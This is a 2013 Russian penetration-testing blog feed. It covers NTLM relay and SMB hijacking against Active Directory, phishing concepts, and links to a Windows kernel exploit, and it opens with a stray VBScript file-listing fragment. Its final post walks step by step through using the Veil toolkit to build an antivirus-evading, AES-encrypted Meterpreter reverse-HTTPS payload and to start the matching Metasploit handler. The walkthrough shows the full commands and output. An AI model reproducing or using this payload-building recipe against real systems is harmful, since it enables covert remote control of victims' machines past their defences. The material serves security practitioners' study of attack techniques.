Set fso = CreateObject("Scripting.FileSystemObject")
 Set ObjFolder = fso.GetFolder(Folder)
 Set ObjSubFolders = ObjFolder.SubFolders
 Set ObjFiles = ObjFolder.Files

For Each ObjSubFolder In ObjSubFolders
  file.WriteLine("<dir>" & Chr(9) & ObjSubFolder.Name)
 Next

For Each ObjFile In ObjFiles
  file.WriteLine(ObjFile.Name)
 Next

If ll <> 0 Then
  For Each ObjSubFolder In ObjSubFolders
   file.WriteLine("")
   file.WriteLine(">ls " & ObjSubFolder.Path)
   ShowFiles ObjSubFolder.Path,1
  Next
 End If 
End Sub

Взломать за 137 секунд

noreply@blogger.com (Dmitry Evteev) — Wed, 26 Jun 2013 16:17:00 +0400

Затрагивая тему конечных целей тестирований на проникновение, можно отметить, что в преобладающем большинстве случаев ключевой целью атаки является получение максимальных привилегий в корневом домене Active Directory. Как ни крути, но большинство корпоративных сетей построено на решениях Microsoft и как следствие в качестве централизованного управления идентификаторами и механизмами авторизации к информационным активам используется Microsoft Active Directory. Обладая соответствующими привилегиями в каталоге становиться возможным использовать их для развития огромного числа всевозможных сценариев атак. Поэтому, как правило, после "захвата" домена пентест переходит в другие плоскости. Например, в плоскость технологического аудита или в сторону развития атаки в направлении смежных систем, напрямую не завязанных на Active Directory (коммуникационное оборудование, ERP и пр.).

Итак, как же можно максимально сократить время на реализацию успешной атаки в отношении каталога домена? Прям до 1 минуты? Я постараюсь раскрыть секрет успеха в данной публикации.

Ntlm relay: начало

Давным-давно, когда компьютеры были большими брррр... где-то я уже это говорил. В общем, все началось с того, что в компании Microsoft придумали не самый безопасный протокол сетевой аутентификации - LanManager. За ним последовало наследие в виде NTLM, который решал только часть недостатков своего предшественника. Впоследствии, накрутив более тяжелые криптографические алгоритмы, появился NTLMv2, который вместе со своими предшественниками перекантовал и до наших дней.

Но вернемся в прошлое. В 1996 году появляется первое исследование на тему фундаментальной уязвимости в протоколе NTLM, а через пять лет появляется и полноценный пруфф. Суть атаки хорошо проиллюстрирована на следующей картинке.

В 2008 году, под давлением появившихся к тому времени готовых к употреблению сплоитов (1, 2, 3), компания Microsoft все-таки решает устранить уязвимость, однако делает это как нельзя криво и вектор атаки перерождается в новое амплуа.

Кроме того, пресловутый патч ms08-068 никак не стесняет атакующего, который осуществляет атаку в отношении кластера. То есть, сценарий 2001 года частично проигрывается и сегодня.

Ntlm relay: сегодня

Несмотря на то, что сегодня атака NTLM Relay широко известна, реализованы концепты межпротокольного перенаправления (например, HTTP->SMB и наоборот), которые в свою очередь портированы в популярные инструменты пентестера (например, MSF), но при всем этом многообразии до 2012 года не хватало универсального "швейцарского ножа". Им стала сборка под названием ZackAttack.

ZackAttack – это фреймворк, который позволяет проводить атаки NTLM-relay на качественно новом уровне. Наибольшую ценность этого фреймворка представляет возможность многократного использования сессии авторизованного пользователя для доступа к любым (с ограничениями) сервисам, авторизация в которых базируется на протоколе NTLM. Другими, не менее ценными достоинствами ZackAttack является автоматизация сценариев атаки (например, создание нового пользователя в Active Directory и добавление его в группу администраторов домена), а также возможность взаимодействия с атакуемыми системами используя пониженные привилегии (отличные от привилегий администратора) поверх proxychains (см. видео). Но стоит озвучить и половник дегтя в банке с медом. Дело в том, что Zack Fasel писал свою балалайку на скорую руку, в следствии чего для эффективного использования текущей сборки ZackAttack требуется бубен, а взаимодействие с атакуемым узлом по протоколу SMB поверх proxychains очень быстро заканчивается на первом же бинарном файле (аналогичная ситуация наблюдается и с передачей паролей через RPC).

ЗЫ. Если кто желает пофиксить баги ZackAttack и допилить поддерживаемый функционал, welcome! -- >> @zfasel

Альтернатива Ntlm relay в режиме реального времени

Ранее я уже писал, что в случае использования аутентификации по протоколу NTLMv1 существует возможность восстановить NT-хеш за приемлемое время, что в перспективе позволяет проводить атаки типа pass-the-hash. Однако этот метод не работает в случае использования аутентификации по протоколу NTLMv2.

Автор Intercepter-NG взглянул на проблему гораздо шире и глубже. Он задал себе вопрос: "Зачем нам релеить авторизацию жертвы, если она сама прекрасно авторизуется на нужном ресурсе?! Нам всего лишь нужно встать посередине и проксировать соединение, дождаться пока Host_A авторизуется на Host_B, а затем взять контроль над сессией в свои руки!" (подробнее). Логика идеи представлена на картинке ниже.

Реализация данной атаки получила название SMB Hijacking и уже доступна для экспериментов в последней версии Intercepter-NG. Have fun!

Angry (birds) horse hacked ATM // ШОК ВИДЕО!!!

noreply@blogger.com (Dmitry Evteev) — Mon, 24 Jun 2013 14:12:00 +0400

ШОК ВИДЕО!11 Конь в футболке Angry birds взламывает банкоматы и использует их в качестве открывашек пива Guinness!

От режиссера:

"Просыпаюсь ночью. Хватаю карандаш.

Пишу сценарий на обоях.

Скандально, вызывающе, амбициозно.

Этот видеоролик меняет мировоззрение.

Многим будет непонятен, многие просмотрят дважды.

Это нормально."

Hacking Practice Lab (ALL-IN-ONE)

noreply@blogger.com (Dmitry Evteev) — Mon, 24 Jun 2013 12:50:00 +0400

На днях Александр Тиморин откопал в Интернете замечательную структурированную подборку большинства дистрибутивов с предустановленными уязвимыми приложениями. На мой взгляд приведенная коллекция является наиболее полной. Ссылка - http://www.amanhardikar.com/mindmaps/Practice.html

Презентации с IT & Security Forum 2013 (ITSF 2013)

noreply@blogger.com (Dmitry Evteev) — Sat, 15 Jun 2013 11:19:00 +0400

На прошедшем в конце недели IT & Security Forum 2013 совместно с Евгенией Поцелуевской рассказали про реалии защищенности современных систем.

Уязвимости систем ДБО в 2011-2012 гг. from Dmitry Evteev

Статистика по результатам тестирований на проникновение и анализа защищенности веб-приложений 2011-2012 from Dmitry Evteev

Базовый курс по внедрению операторов SQL

noreply@blogger.com (Dmitry Evteev) — Wed, 12 Jun 2013 18:40:00 +0400

Для желающих подтянуть свои азы хакерского искусства на ресурсе pentesterlab.com опубликованы два базовых курса, посвященные развитию атаки с использованием одной из наиболее распространенных уязвимостей - "Внедрение операторов SQL". Рекомендую! (на заметку преподавателям)

Ссылка на первый курс
Ссылка на второй курс

Для тех, кому копания в SQL-инъекциях уже не вставляет, рекомендую сборку Torsa - 1.3.

Using the HTML5 for Phishing Attacks

noreply@blogger.com (Dmitry Evteev) — Tue, 4 Jun 2013 14:05:00 +0400

Бурное развитие технологий неизбежно приводит к появлению новых методов мошеннических действий в отношении неподготовленных пользователей. Так, переход к WEB2++ && HTML5 позволил превратить жизнь обычных путешественников Интернета в увлекательное интерактивное приключение, в котором можно подцепить какую-нибудь паразитирующую живность, раскрыть номер своей пластиковой карты или попросту передать деньги через электронную почту :)

Сегодня мне на глаза попались два концепта, которые демонстрируют насколько коварными могут быть современные методы фишинга:
- Fake Chrome Browser
- Using the HTML5 Fullscreen API for Phishing Attacks

Первый концепт демонстрирует полноценную работу браузера Google Chrome.

Второй показывает альтернативу атакам, завязанным на приложения "защищенные" SSL-соединением.

Разумеется, оба примера далеки от продуктивных сборок, чтобы без каких-либо дополнительных усилий начинать собирать деньги с их помощью. Тем не менее, в скором времени стоит ожидать и более изощренных сценариев, применяемых при проведении фишинговых атак. Благо дело, технологии позволяют и все упирается лишь в фантазию злоумышленников. Поэтому будьте бдительны!

Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit

noreply@blogger.com (Dmitry Evteev) — Mon, 3 Jun 2013 17:10:00 +0400

В публичном доступе был найден готовый к употреблению эксплоит для уязвимости CVE-2013-3660. Эксплоит доступен по следующей ссылке.

В настоящее время сообщается о наличии сплоета только под 32 разрядную платформу.

Референсы:

https://rdot.org/forum/showthread.php?t=2753
http://www.cvedetails.com/cve/CVE-2013-3660/

A Payload Generator to Bypass Antivirus

noreply@blogger.com (Dmitry Evteev) — Mon, 3 Jun 2013 15:59:00 +0400

Очередной "булыжник" в сторону большинства современных аверов демонстрирует сборка под названием Veil. Этот волшебный тулкит представляет из себя генератор полезной нагрузки совместимый с MSF (базируется на msfvenom). После окончательной сборки через Pyinstaller или Py2Exe полученная бинарь в настоящее время распознается только двумя антивирусными решениями (и не самыми популярными...).

Установка и использование

"- Kali

- Backtrack

- Kali

- Backtrack

- Okay, take both" (c) anonymous

# git clone https://github.com/ChrisTruncer/Veil.git

# cd Veil/setup

# ./setup.sh

...

# ./Veil.py

=========================================================================

Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013

=========================================================================

[?] What payload type would you like to use?

1 - Meterpreter - Python - void pointer

2 - Meterpreter - Python - VirtualAlloc()

3 - Meterpreter - Python - base64 Encoded

4 - Meterpreter - Python - Letter Substitution

5 - Meterpreter - Python - ARC4 Stream Cipher

6 - Meterpreter - Python - DES Encrypted

7 - Meterpreter - Python - AES Encrypted

8 - Meterpreter - C - void pointer

9 - Meterpreter - C - VirtualAlloc()

0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================

Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013

=========================================================================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)

2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================

Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013

=========================================================================

[?] What type of payload would you like?

1 - Reverse TCP

2 - Reverse HTTP

3 - Reverse HTTPS

0 - Main Menu

[>] Please enter the number of your choice: 3

[?] What's the Local Host IP Address: 192.168.1.123

[?] What's the Local Port Number: 443

[*] Generating shellcode...

=========================================================================

Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013

=========================================================================

[?] How would you like to create your payload executable?

1 - Pyinstaller (default)

2 - Py2Exe

[>] Please enter the number of your choice: 1

55 INFO: wrote Z:\root\v\Veil\payload.spec

...

8134 INFO: Appending archive to EXE Z:\root\v\Veil\dist\payload.exe

=========================================================================

Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013

=========================================================================

[!] Be sure to set up a Reverse HTTPS handler with the following settings:

PAYLOAD = windows/meterpreter/reverse_https

LHOST = 192.168.1.123

LPORT = 443

[!] Your payload files have been generated, don't get caught!

# file payload.exe

payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

...

# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

PAYLOAD => windows/meterpreter/reverse_https

msf exploit(handler) > set LHOST 192.168.1.123

LHOST => 192.168.1.123

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://192.168.1.123:443/

[*] Starting the payload handler...